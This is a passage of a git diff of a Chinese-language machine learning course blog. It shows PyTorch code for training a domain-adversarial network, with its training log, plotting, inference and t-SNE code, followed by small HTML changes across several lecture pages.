                      # running_F_loss 用于累计特征提取器和标签分类器的损失;
                      running_D_loss, running_F_loss = 0.0, 0.0
                      # total_hit 和 total_num 用于计算源域的分类准确率。
                      total_hit, total_num = 0.0, 0.0

                      for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
                      # 这个循环同时迭代源域和目标域的数据批次。每次迭代中,source_data 和 source_label 为源域的图像和标签,target_data 为目标域的图像。
                      source_data = source_data.cuda()
                      source_label = source_label.cuda()
                      target_data = target_data.cuda()

                      # Mixed the source data and target data, or it'll mislead the running params
                      # of batch_norm. (runnning mean/var of soucre and target data are different.)
                      mixed_data = torch.cat([source_data, target_data], dim=0)
                      domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
                      # set domain label of source data to be 1.
                      domain_label[:source_data.shape[0]] = 1

                      # Step 1 : train domain classifier
                      # 第一步:训练域分类器
                      # 提取合并数据的特征 feature,feature.detach() 防止梯度反向传播到 feature_extractor。
                      feature = feature_extractor(mixed_data)
                      # We don't need to train feature extractor in step 1.
                      # Thus we detach the feature neuron to avoid backpropgation.
                      domain_logits = domain_classifier(feature.detach())
                      # 使用域标签 domain_label 和预测的 domain_logits 计算域分类损失 loss。
                      loss = domain_criterion(domain_logits, domain_label)
                      running_D_loss += loss.item()
                      loss.backward()
                      optimizer_D.step()

                      # Step 2 : train feature extractor and label classifier
                      # 第二步:训练特征提取器和标签分类器
                      # class_logits 是标签分类器的预测结果,用于源域的分类。
                      class_logits = label_predictor(feature[:source_data.shape[0]])
                      # domain_logits 用于域分类。
                      domain_logits = domain_classifier(feature)
                      # loss = cross entropy of classification - lamb * domain binary cross entropy.
                      # The reason why using subtraction is similar to generator loss in disciminator of GAN
                      # 损失函数包括源域的分类损失 class_criterion(class_logits, source_label) 和域适配损失 domain_criterion(domain_logits, domain_label),两者相减以达到类似对抗训练的效果。
                      loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
                      running_F_loss += loss.item()
                      loss.backward()
                      # 更新 feature_extractor 和 label_predictor 的参数。
                      # 每次训练批次后清零梯度,并计算源域的分类准确率。
                      optimizer_F.step()
                      optimizer_C.step()

                      optimizer_D.zero_grad()
                      optimizer_F.zero_grad()
                      optimizer_C.zero_grad()

                      total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
                      total_num += source_data.shape[0]
                      print(i, end='\r')

                      return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

                      # train 200 epochs
                      # 在 200 个 epoch 中循环,每次 epoch 后保存模型参数并输出训练的损失和准确率。
                      for epoch in range(200):

                      train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

                      torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
                      torch.save(label_predictor.state_dict(), f'predictor_model.bin')

                      print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      52
                      53
                      54
                      55
                      56
                      57
                      58
                      59
                      60
                      61
                      62
                      63
                      64
                      65
                      66
                      67
                      68
                      69
                      70
                      71
                      72
                      73
                      74
                      75
                      76
                      77
                      78
                      79
                      80
                      81
                      82
                      83
                      84
                      85
                      86
                      87
                      88
                      89
                      90
                      91
                      92
                      93
                      94
                      95
                      96
                      97
                      98
                      99
                      100
                      101
                      102
                      103
                      104
                      105
                      106
                      107
                      108
                      109
                      110
                      111
                      112
                      113
                      114
                      115
                      116
                      117
                      118
                      119
                      120
                      121
                      122
                      123
                      124
                      125
                      126
                      127
                      128
                      129
                      130
                      131
                      132
                      133
                      134
                      135
                      136
                      137
                      138
                      139
                      140
                      141
                      142
                      143
                      144
                      145
                      146
                      147
                      148
                      149
                      150
                      151
                      152
                      153
                      154
                      155
                      156
                      157
                      158
                      159
                      160
                      161
                      162
                      163
                      164
                      165
                      166
                      167
                      168
                      169
                      170
                      171
                      172
                      173
                      174
                      175
                      176
                      177
                      178
                      179
                      180
                      181
                      182
                      183
                      184
                      185
                      186
                      187
                      188
                      189
                      190
                      191
                      192
                      193
                      194
                      195
                      196
                      197
                      198
                      199
                      200
                      epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
                      epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
                      epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
                      epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
                      epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
                      epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
                      epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
                      epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
                      epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
                      epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
                      epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
                      epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
                      epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
                      epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
                      epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
                      epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
                      epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
                      epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
                      epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
                      epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
                      epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
                      epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
                      epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
                      epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
                      epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
                      epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
                      epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
                      epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
                      epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
                      epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
                      epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
                      epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
                      epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
                      epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
                      epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
                      epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
                      epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
                      epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
                      epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
                      epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
                      epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
                      epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
                      epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
                      epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
                      epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
                      epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
                      epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
                      epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
                      epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
                      epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
                      epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
                      epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
                      epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
                      epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
                      epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
                      epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
                      epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
                      epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
                      epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
                      epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
                      epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
                      epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
                      epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
                      epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
                      epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
                      epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
                      epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
                      epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
                      epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
                      epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
                      epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
                      epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
                      epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
                      epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
                      epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
                      epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
                      epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
                      epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
                      epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
                      epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
                      epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
                      epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
                      epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
                      epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
                      epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
                      epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
                      epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
                      epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
                      epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
                      epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
                      epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
                      epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
                      epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
                      epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
                      epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
                      epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
                      epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
                      epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
                      epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
                      epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
                      epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
                      epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
                      epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
                      epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
                      epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
                      epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
                      epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
                      epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
                      epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
                      epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
                      epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
                      epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
                      epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
                      epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
                      epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
                      epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
                      epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
                      epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
                      epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
                      epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
                      epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
                      epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
                      epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
                      epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
                      epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
                      epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
                      epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
                      epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
                      epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
                      epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
                      epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
                      epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
                      epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
                      epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
                      epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
                      epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
                      epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
                      epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
                      epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
                      epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
                      epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
                      epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
                      epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
                      epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
                      epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
                      epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
                      epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
                      epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
                      epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
                      epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
                      epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
                      epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
                      epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
                      epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
                      epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
                      epoch 155: train D loss: 0.3950, train F loss: 0.0180, acc 0.9808
                      epoch 156: train D loss: 0.4017, train F loss: 0.0205, acc 0.9808
                      epoch 157: train D loss: 0.3952, train F loss: 0.0484, acc 0.9734
                      epoch 158: train D loss: 0.3885, train F loss: 0.0346, acc 0.9776
                      epoch 159: train D loss: 0.3916, train F loss: 0.0202, acc 0.9812
                      epoch 160: train D loss: 0.3980, train F loss: 0.0306, acc 0.9774
                      epoch 161: train D loss: 0.3897, train F loss: 0.0306, acc 0.9800
                      epoch 162: train D loss: 0.3909, train F loss: 0.0164, acc 0.9816
                      epoch 163: train D loss: 0.3911, train F loss: 0.0273, acc 0.9806
                      epoch 164: train D loss: 0.3737, train F loss: 0.0133, acc 0.9830
                      epoch 165: train D loss: 0.4064, train F loss: 0.0520, acc 0.9706
                      epoch 166: train D loss: 0.3951, train F loss: 0.0242, acc 0.9810
                      epoch 167: train D loss: 0.3865, train F loss: 0.0287, acc 0.9810
                      epoch 168: train D loss: 0.3921, train F loss: 0.0141, acc 0.9814
                      epoch 169: train D loss: 0.3862, train F loss: 0.0130, acc 0.9836
                      epoch 170: train D loss: 0.4018, train F loss: 0.0273, acc 0.9764
                      epoch 171: train D loss: 0.4053, train F loss: 0.0254, acc 0.9774
                      epoch 172: train D loss: 0.4040, train F loss: 0.0169, acc 0.9810
                      epoch 173: train D loss: 0.3935, train F loss: 0.0463, acc 0.9734
                      epoch 174: train D loss: 0.3991, train F loss: 0.0199, acc 0.9804
                      epoch 175: train D loss: 0.3919, train F loss: 0.0275, acc 0.9800
                      epoch 176: train D loss: 0.4021, train F loss: 0.0315, acc 0.9780
                      epoch 177: train D loss: 0.3856, train F loss: 0.0289, acc 0.9796
                      epoch 178: train D loss: 0.3880, train F loss: 0.0171, acc 0.9812
                      epoch 179: train D loss: 0.3874, train F loss: 0.0200, acc 0.9824
                      epoch 180: train D loss: 0.3974, train F loss: 0.0243, acc 0.9826
                      epoch 181: train D loss: 0.3981, train F loss: 0.0191, acc 0.9812
                      epoch 182: train D loss: 0.4048, train F loss: 0.0159, acc 0.9822
                      epoch 183: train D loss: 0.3929, train F loss: 0.0212, acc 0.9796
                      epoch 184: train D loss: 0.3944, train F loss: 0.0130, acc 0.9822
                      epoch 185: train D loss: 0.3895, train F loss: 0.0402, acc 0.9752
                      epoch 186: train D loss: 0.3849, train F loss: 0.0136, acc 0.9826
                      epoch 187: train D loss: 0.3791, train F loss: 0.0222, acc 0.9814
                      epoch 188: train D loss: 0.3990, train F loss: 0.0190, acc 0.9812
                      epoch 189: train D loss: 0.3964, train F loss: 0.0317, acc 0.9794
                      epoch 190: train D loss: 0.3935, train F loss: 0.0385, acc 0.9788
                      epoch 191: train D loss: 0.3914, train F loss: 0.0218, acc 0.9812
                      epoch 192: train D loss: 0.3764, train F loss: 0.0212, acc 0.9822
                      epoch 193: train D loss: 0.3782, train F loss: 0.0193, acc 0.9836
                      epoch 194: train D loss: 0.3787, train F loss: 0.0111, acc 0.9832
                      epoch 195: train D loss: 0.4000, train F loss: 0.0239, acc 0.9808
                      epoch 196: train D loss: 0.3830, train F loss: 0.0201, acc 0.9836
                      epoch 197: train D loss: 0.4085, train F loss: 0.0230, acc 0.9802
                      epoch 198: train D loss: 0.3908, train F loss: 0.0197, acc 0.9802
                      epoch 199: train D loss: 0.3981, train F loss: 0.0170, acc 0.9820

                      绘制图表:

                      -
                      import re
                      import matplotlib.pyplot as plt

                      # 你的字符串数据
                      data = """
                      epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
                      epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
                      epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
                      epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
                      ...
                      """

                      # 使用正则表达式提取数据
                      pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
                      matches = re.findall(pattern, data)

                      # 转换数据格式
                      epochs = []
                      d_losses = []
                      f_losses = []
                      accuracies = []

                      for match in matches:
                      epoch, d_loss, f_loss, acc = map(float, match)
                      epochs.append(int(epoch))
                      d_losses.append(d_loss)
                      f_losses.append(f_loss)
                      accuracies.append(acc)

                      # 绘制图表
                      plt.figure(figsize=(10, 6))

                      # 绘制 D loss 和 F loss
                      plt.subplot(2, 1, 1)
                      plt.plot(epochs, d_losses, label='D Loss', color='blue')
                      plt.plot(epochs, f_losses, label='F Loss', color='orange')
                      plt.xlabel('Epoch')
                      plt.ylabel('Loss')
                      plt.title('Train Losses Over Epochs')
                      plt.legend()

                      # 绘制 Accuracy
                      plt.subplot(2, 1, 2)
                      plt.plot(epochs, accuracies, label='Accuracy', color='green')
                      plt.xlabel('Epoch')
                      plt.ylabel('Accuracy')
                      plt.title('Accuracy Over Epochs')
                      plt.legend()

                      plt.tight_layout()
                      plt.show()
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      22
                      23
                      24
                      25
                      26
                      27
                      28
                      29
                      30
                      31
                      32
                      33
                      34
                      35
                      36
                      37
                      38
                      39
                      40
                      41
                      42
                      43
                      44
                      45
                      46
                      47
                      48
                      49
                      50
                      51
                      import re
                      import matplotlib.pyplot as plt

                      # 你的字符串数据
                      data = """
                      epoch 0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
                      epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
                      epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
                      epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
                      ...
                      """

                      # 使用正则表达式提取数据
                      pattern = r"epoch\s+(\d+): train D loss: ([\d.]+), train F loss: ([\d.]+), acc ([\d.]+)"
                      matches = re.findall(pattern, data)

                      # 转换数据格式
                      epochs = []
                      d_losses = []
                      f_losses = []
                      accuracies = []

                      for match in matches:
                      epoch, d_loss, f_loss, acc = map(float, match)
                      epochs.append(int(epoch))
                      d_losses.append(d_loss)
                      f_losses.append(f_loss)
                      accuracies.append(acc)

                      # 绘制图表
                      plt.figure(figsize=(10, 6))

                      # 绘制 D loss 和 F loss
                      plt.subplot(2, 1, 1)
                      plt.plot(epochs, d_losses, label='D Loss', color='blue')
                      plt.plot(epochs, f_losses, label='F Loss', color='orange')
                      plt.xlabel('Epoch')
                      plt.ylabel('Loss')
                      plt.title('Train Losses Over Epochs')
                      plt.legend()

                      # 绘制 Accuracy
                      plt.subplot(2, 1, 2)
                      plt.plot(epochs, accuracies, label='Accuracy', color='green')
                      plt.xlabel('Epoch')
                      plt.ylabel('Accuracy')
                      plt.title('Accuracy Over Epochs')
                      plt.legend()

                      plt.tight_layout()
                      plt.show()

                      png

                      推理

                      ​ 我们使用 pandas 生成 csv 文件。

                      ​ 顺便说一句,训练 200 个 epoch 的模型的性能可能不稳定。您可以训练更多 epoch 以获得更稳定的性能。

                      -
                      # 初始化和设置模型为评估模式
                      result = []
                      label_predictor.eval()
                      feature_extractor.eval()

                      # 循环遍历测试数据并进行预测
                      for i, (test_data, _) in enumerate(test_dataloader):
                      test_data = test_data.cuda()

                      class_logits = label_predictor(feature_extractor(test_data))

                      x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
                      result.append(x)

                      import pandas as pd
                      result = np.concatenate(result)

                      # Generate your submission
                      # 合并预测结果
                      df = pd.DataFrame({'id': np.arange(0,len(result)), 'label': result})
                      df.to_csv('DaNN_submission.csv',index=False)
                      +
                      1
                      2
                      3
                      4
                      5
                      6
                      7
                      8
                      9
                      10
                      11
                      12
                      13
                      14
                      15
                      16
                      17
                      18
                      19
                      20
                      21
                      # 初始化和设置模型为评估模式
                      result = []
                      label_predictor.eval()
                      feature_extractor.eval()

                      # 循环遍历测试数据并进行预测
                      for i, (test_data, _) in enumerate(test_dataloader):
                      test_data = test_data.cuda()

                      class_logits = label_predictor(feature_extractor(test_data))

                      x = torch.argmax(class_logits, dim=1).cpu().detach().numpy()
                      result.append(x)

                      import pandas as pd
                      result = np.concatenate(result)

                      # Generate your submission
                      # 合并预测结果
                      df = pd.DataFrame({'id': np.arange(0,len(result)), 'label': result})
                      df.to_csv('DaNN_submission.csv',index=False)

                      可视化

                      ​ 我们使用 t-SNE 图来观察提取特征的分布。

                      -
                      import numpy as np
                      import matplotlib.pyplot as plt
                      from sklearn import manifold
                      +
                      1
                      2
                      3
                      import numpy as np
                      import matplotlib.pyplot as plt
                      from sklearn import manifold
                      @@ -4822,6 +4820,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = "360px"; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" index 12592cd3f3..c173bf88a3 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 12-Reinforcement Learning/index.html" @@ -44,8 +44,6 @@ - - @@ -4822,6 +4820,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" index 0d71d286e5..639ad76d4d 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 13-Network Compression/index.html" @@ -44,8 +44,6 @@ - - @@ -4494,6 +4492,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" index 67528c170e..95c626bb9e 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 2-What to do if my network fails to train/index.html" @@ -44,8 +44,6 @@ - - @@ -5145,6 +5143,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" index 8e0295f637..8ce585591a 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 3-Image as input/index.html" @@ -44,8 +44,6 @@ - - @@ -4654,6 +4652,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" index 9575e5612c..999a404b47 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 4-Sequence as input/index.html" @@ -44,8 +44,6 @@ - - @@ -5111,6 +5109,8 @@

                      目录

                      var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" index 4340916707..7deb8e9f61 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 5-Sequence to sequence/index.html" @@ -44,8 +44,6 @@ - - @@ -935,10 +933,10 @@

                      Leve
                    • 第三个 Decoder 是 token 分类器,根据【PLH】的位置预测对应的单词。

                    ​ 这个模型训练就是采用上面提到的从另外一个模型学习的方法(knowledge distillation)。具体算法称为:Levenshtein Distance Algorithm

                    -
                    import Levenshtein
                    Levenshtein.distance("ABCEFGHJJ", "ABCDEFGHI")
                    -
                    3
                    -
                    Levenshtein.editops("ABCEFGHJJ", "ABCDEFGHI")
                    -
                    [('insert', 3, 3), ('delete', 7, 8), ('replace', 8, 8)]
                    +
                    1
                    2
                    import Levenshtein
                    Levenshtein.distance("ABCEFGHJJ", "ABCDEFGHI")
                    +
                    1
                    3
                    +
                    1
                    Levenshtein.editops("ABCEFGHJJ", "ABCDEFGHI")
                    +
                    1
                    [('insert', 3, 3), ('delete', 7, 8), ('replace', 8, 8)]

                    png

                    CTC

                    png

                    @@ -5042,6 +5040,8 @@

                    目录

                    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" index f1038bca01..ec17649b75 100644 --- "a/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" +++ "b/posts/ML-\346\235\216\345\256\217\346\257\205-Lecture 6-Generation/index.html" @@ -44,8 +44,6 @@ - - @@ -5049,6 +5047,8 @@

                    目录

